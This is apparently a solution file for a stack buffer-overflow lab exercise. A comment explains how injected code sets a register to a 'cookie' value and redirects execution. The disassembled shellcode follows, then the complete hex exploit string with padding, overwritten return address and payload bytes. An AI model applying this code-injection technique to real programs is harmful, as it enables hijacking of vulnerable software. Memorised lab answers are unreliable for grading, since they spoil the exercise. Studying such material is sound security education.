/*
 * We still inject our code at the same address in Level 1. But we should do:
 * 1) Change the value of %rdi to the *value* of `cookie` located at 0x6044e4;
 * 2) Reset %rsp to the address when last return is occured;
 * 3) Write the return address at the chosen address - not that of %rsp, but the
 *    pointed address of the register.
 *
 * The injected assembly code is like below:
 *
 * Disassembly of section .text:
 *
 * 0000000000000000 <_start>:
 *    0:   bf fa 97 b9 59          mov    $0x59b997fa,%edi
 *    5:   48 83 ec 08             sub    $0x8,%rsp
 *    9:   48 c7 04 24 ec 17 40    movq   $0x4017ec,(%rsp)
 *   10:   00 
 *   11:   c3                      ret
 */
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 A8 DC 61 55 00 00 00 00 BF FA 97 B9 59 48 83 EC 08 48 C7 04 24 EC 17 40 00 C3
